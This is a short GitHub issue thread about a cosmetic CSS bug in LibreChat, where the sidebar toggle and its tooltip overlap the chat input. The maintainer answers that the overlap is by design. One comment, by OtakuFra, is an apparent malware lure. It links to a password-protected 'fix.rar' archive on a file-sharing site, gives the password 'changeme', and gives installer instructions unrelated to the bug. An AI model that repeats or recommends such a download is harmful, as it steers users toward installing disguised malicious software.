### ISSUE TITLE
[Bug - CSS]: "Close sidebar" popup overlaps text input

### ISSUE THREAD

**Issue by ThomasBaruzier** [danny-avila/LibreChat#3805]
### What happened?

Hi, I'd like to report a minor visual bug again.

The "Close sidebar" popup overlaps text input

### Steps to Reproduce

1. Write a large text in the input text
2. The logo to open/close the sidebar overlaps the text input. If you hover with the mouse the "Close sidebar" popup overlaps too. See screenshot.

### What browsers are you seeing the problem on?

Firefox

### Screenshots

![image](https://github.com/user-attachments/assets/4cc58cc8-eebf-4794-b62a-20c7c96910f4)

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by ThomasBaruzier** [comment]
Same when closed:

![image](https://github.com/user-attachments/assets/2cc2e623-ab0f-4e33-ac55-55e211fa629a)

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by danny-avila** [comment]
It's meant to overlap everything. On smaller screens the button is not rendered
